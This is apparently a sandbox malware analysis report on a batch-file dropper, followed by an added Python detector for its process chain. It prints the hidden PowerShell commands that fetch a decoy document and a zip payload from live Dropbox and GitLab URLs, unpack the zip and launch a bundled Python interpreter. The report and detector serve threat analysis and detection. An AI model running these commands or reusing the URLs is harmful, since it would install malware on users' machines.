Analysis

  • max time kernel
    122s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    22-11-2024 02:06

General

  • Target

    10f2af74b935ffc5664a6a9bf0d141f30777e4211ef4d75ad65c6db77554cbfb.bat

  • Size

    32KB

  • MD5

    35dfb522fddada4616e915fb17888e31

  • SHA1

    8fbbfe83e8f5faa59037fbbf4fd97bc2c78f95e6

  • SHA256

    10f2af74b935ffc5664a6a9bf0d141f30777e4211ef4d75ad65c6db77554cbfb

  • SHA512

    9e35fa005d0e1756bcf45b43db52c7be1ff584f8cdbf4349c06d6cabdff03acd1ea32c2e3cfc72cbd28b7d41853b2e7c44784b5d1e585b7fae2dc480e60305a5

  • SSDEEP

    384:UuGq+dSBNrJ0AKr6CLNOPKQdKJGE9v62FTJsN/6SdRfIeq2sOGLtY6:mq+dSBNdBKrhLNJL8E9rTJsNCSE3w96

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.dropbox.com/scl/fi/qukhm5nxh9vj4yeib9imn/20_Advertising_Campaign_and_Collaboration.docx?rlkey=wbac1g8wzi5e49dnttqx9sv3h&st=g4q7mwtc&dl=1

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://gitlab.com/bosechang/mkt/-/raw/main/20Fukrun.zip

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\10f2af74b935ffc5664a6a9bf0d141f30777e4211ef4d75ad65c6db77554cbfb.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2296
    • C:\Windows\system32\chcp.com
      chcp.com 437
      2⤵
      PID:2492
    • C:\Windows\system32\find.exe
      find
      2⤵
      PID:2324
    • C:\Windows\system32\findstr.exe
      findstr /L /I set C:\Users\Admin\AppData\Local\Temp\10f2af74b935ffc5664a6a9bf0d141f30777e4211ef4d75ad65c6db77554cbfb.bat
      2⤵
      PID:2348
    • C:\Windows\system32\findstr.exe
      findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\10f2af74b935ffc5664a6a9bf0d141f30777e4211ef4d75ad65c6db77554cbfb.bat
      2⤵
      PID:1048
    • C:\Windows\system32\findstr.exe
      findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\10f2af74b935ffc5664a6a9bf0d141f30777e4211ef4d75ad65c6db77554cbfb.bat
      2⤵
      PID:2636
    • C:\Windows\system32\findstr.exe
      findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\10f2af74b935ffc5664a6a9bf0d141f30777e4211ef4d75ad65c6db77554cbfb.bat
      2⤵
      PID:2440
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c type tmp
      2⤵
      PID:2640
    • C:\Windows\system32\find.exe
      fiNd
      2⤵
      PID:2076
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c type tmp
      2⤵
      PID:1424
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/qukhm5nxh9vj4yeib9imn/20_Advertising_Campaign_and_Collaboration.docx?rlkey=wbac1g8wzi5e49dnttqx9sv3h&st=g4q7mwtc&dl=1', 'C:\Users\Admin\AppData\Local\Temp\\20_Advertising_Campaign_and_Collaboration.docx')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3032
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\\20_Advertising_Campaign_and_Collaboration.docx'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3048
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bosechang/mkt/-/raw/main/20Fukrun.zip', 'C:\Users\Public\Document.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2728
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2836
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2764
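The process tree above is a staged dropper: a batch file that scans its own body with findstr, then spawns hidden PowerShell instances to fetch a decoy .docx from Dropbox, fetch a zip from GitLab into C:\Users\Public, unpack it, and run a bundled pythonw.exe against a non-.py file. The following is an added example, not part of this sandbox report: a small Python detector that replays that chain as constructed process-creation events (PIDs, images and command lines taken from the report; the root cmd.exe's parent PID 1000, the rule names and the ATT&CK technique IDs are my own assumptions) and flags each stage, extracts the URL IOCs, and decides whether one process tree completed the download/unpack/execute sequence.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (fields a Sysmon EID 1 or Security 4688 record carries)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample input modelled on the report's process tree. Not a real log
# export: PIDs and command lines are the report's, the root's parent PID is assumed.
BAT = (r"C:\Users\Admin\AppData\Local\Temp"
       r"\10f2af74b935ffc5664a6a9bf0d141f30777e4211ef4d75ad65c6db77554cbfb.bat")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
DROPBOX_URL = ("https://www.dropbox.com/scl/fi/qukhm5nxh9vj4yeib9imn/"
               "20_Advertising_Campaign_and_Collaboration.docx"
               "?rlkey=wbac1g8wzi5e49dnttqx9sv3h&st=g4q7mwtc&dl=1")
GITLAB_URL = "https://gitlab.com/bosechang/mkt/-/raw/main/20Fukrun.zip"
TLS12 = "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; "
WEBCLIENT = "(New-Object -TypeName System.Net.WebClient).DownloadFile("
DECOY = r"C:\Users\Admin\AppData\Local\Temp\\20_Advertising_Campaign_and_Collaboration.docx"

EVENTS = [
    ProcEvent(2296, 1000, r"C:\Windows\system32\cmd.exe", f'cmd /c "{BAT}"'),
    ProcEvent(2492, 2296, r"C:\Windows\system32\chcp.com", "chcp.com 437"),
    ProcEvent(2348, 2296, r"C:\Windows\system32\findstr.exe", f"findstr /L /I set {BAT}"),
    ProcEvent(1048, 2296, r"C:\Windows\system32\findstr.exe", f"findstr /L /I goto {BAT}"),
    ProcEvent(3032, 2296, PS, 'powershell.exe -WindowStyle Hidden -Command "' + TLS12
              + WEBCLIENT + f"'{DROPBOX_URL}', '{DECOY}')\""),
    ProcEvent(3048, 2296, PS, f"powershell -WindowStyle Hidden -Command \"Start-Process '{DECOY}'\""),
    ProcEvent(2728, 2296, PS, 'powershell.exe -WindowStyle Hidden -Command "' + TLS12
              + WEBCLIENT + f"'{GITLAB_URL}', 'C:\\Users\\Public\\Document.zip')\""),
    ProcEvent(2836, 2296, PS, 'powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName '
              "System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory("
              "'C:/Users/Public/Document.zip', 'C:/Users/Public/Document')\""),
    ProcEvent(2764, 2296, PS, 'powershell.exe -WindowStyle Hidden -Command " '
              r"C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\rz_317.pd clickapp" + '"'),
]

HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hid(?:den)?\b", re.I)
DOWNLOAD_RE = re.compile(r"\.DownloadFile\(|\.DownloadString\(|Invoke-WebRequest|Start-BitsTransfer", re.I)
EXTRACT_RE = re.compile(r"ZipFile\]::ExtractToDirectory\(|Expand-Archive", re.I)
DECOY_RE = re.compile(r"""Start-Process\s+['"]?[^\s'"]+\.(?:docx?|xlsx?|pdf)\b""", re.I)
PUBLIC_PYTHON_RE = re.compile(r"""\\Users\\Public\\[^\s'"]*pythonw?\.exe\s+['"]?([^\s'"]+)""", re.I)
URL_RE = re.compile(r"""https?://[^\s'"]+""", re.I)
SCRIPT_EXTS = (".py", ".pyw")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return {pid: [(rule_name, attack_technique_or_None), ...]} for every event."""
    by_pid = {e.pid: e for e in events}
    hits = {}
    for e in events:
        found, cmd, parent = [], e.cmdline, by_pid.get(e.ppid)
        if basename(e.image) == "powershell.exe":
            if HIDDEN_RE.search(cmd):
                found.append(("powershell_hidden_window", "T1564.003"))
            if DOWNLOAD_RE.search(cmd):
                found.append(("powershell_download", "T1105"))
            if EXTRACT_RE.search(cmd):
                found.append(("archive_extract", "T1140"))
            if DECOY_RE.search(cmd):
                found.append(("decoy_document_opened", None))
            m = PUBLIC_PYTHON_RE.search(cmd)
            if m and not m.group(1).lower().endswith(SCRIPT_EXTS):
                # bundled interpreter in a world-writable dir, fed a file that is not a .py script
                found.append(("python_from_public", "T1059.006"))
        # findstr launched by a batch file and pointed back at that same batch file
        if basename(e.image) == "findstr.exe" and parent is not None:
            target = cmd.rsplit(" ", 1)[-1].lower()
            if target.endswith(".bat") and target in parent.cmdline.lower():
                found.append(("batch_self_inspection", "T1059.003"))
        hits[e.pid] = found
    return hits


def extract_urls(events):
    """Unique URLs seen in command lines, in first-seen order (network IOCs)."""
    seen = []
    for e in events:
        seen.extend(u for u in URL_RE.findall(e.cmdline) if u not in seen)
    return seen


def chain_rules(events):
    """Collapse per-process hits onto the root of each process tree: {root_pid: {rule names}}."""
    by_pid, hits, roots = {e.pid: e for e in events}, analyze(events), {}
    for e in events:
        root = e
        while root.ppid in by_pid:
            root = by_pid[root.ppid]
        roots.setdefault(root.pid, set()).update(r for r, _ in hits[e.pid])
    return roots


STAGED_DROPPER = {"powershell_download", "archive_extract", "python_from_public"}


def is_staged_dropper_chain(rules):
    """True when one tree downloads, unpacks and runs a payload via a dropped interpreter."""
    return STAGED_DROPPER <= set(rules)


if __name__ == "__main__":
    for pid, found in analyze(EVENTS).items():
        if found:
            print(pid, ", ".join(f"{r} ({t or 'n/a'})" for r, t in found))
    for root, rules in chain_rules(EVENTS).items():
        print(f"root {root}: staged dropper={is_staged_dropper_chain(rules)} urls={extract_urls(EVENTS)}")
```

The per-process rules are deliberately weak on their own (hidden PowerShell windows and WebClient downloads occur in benign admin scripts); the signal comes from chain_rules, which attributes every stage back to the root cmd.exe so the download, unpack and interpreter-launch steps are judged together. Feeding real Sysmon or 4688 records in requires only mapping ProcessId, ParentProcessId, Image and CommandLine onto ProcEvent.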

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\tmp

    Filesize
    14B

    MD5
    ce585c6ba32ac17652d2345118536f9c

    SHA1
    be0e41b3690c42e4c0cdb53d53fc544fb46b758d

    SHA256
    589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

    SHA512
    d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize
    7KB

    MD5
    305050597d183a0f2df4a28082787761

    SHA1
    e1bc840d920ae57060180a3cc7171049ea7d5009

    SHA256
    130637b726637855e55a20d71f5fe3e629b288a930cd2e86e21b291ffdb11f0e

    SHA512
    816c967ee8d11cbc5dd116be0a6b08969a7eb468c50f99c74fa24660e17c67998cbc272253e20151359c271d62c003d4ab1d6bf9f0f79f2ee9c6905cf22b50ac

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize
    7KB

    MD5
    bc2c8b28964af2ea91fa7cff3a169dfc

    SHA1
    25b5f5db7428499930573d912ef7d6f3dde37d23

    SHA256
    6083b4a63251a15b04f4b9aa142034f89d914197381c1e5cce3f1d3f8ab8c638

    SHA512
    f3b90145e36d19d41855924504f9ad0c83538c7196970783e20c6dde3d1b1b475b12c520e6be19e38c93da9615574c6e5af54a77bb656b434b3d6525442620c7

  • memory/3032-8-0x0000000002AD0000-0x0000000002B50000-memory.dmp

    Filesize
    512KB

  • memory/3032-9-0x000000001B650000-0x000000001B932000-memory.dmp

    Filesize
    2.9MB

  • memory/3032-10-0x0000000001E60000-0x0000000001E68000-memory.dmp

    Filesize
    32KB

  • memory/3032-11-0x0000000002AD0000-0x0000000002B50000-memory.dmp

    Filesize
    512KB

  • memory/3048-17-0x000000001B670000-0x000000001B952000-memory.dmp

    Filesize
    2.9MB

  • memory/3048-18-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

    Filesize
    32KB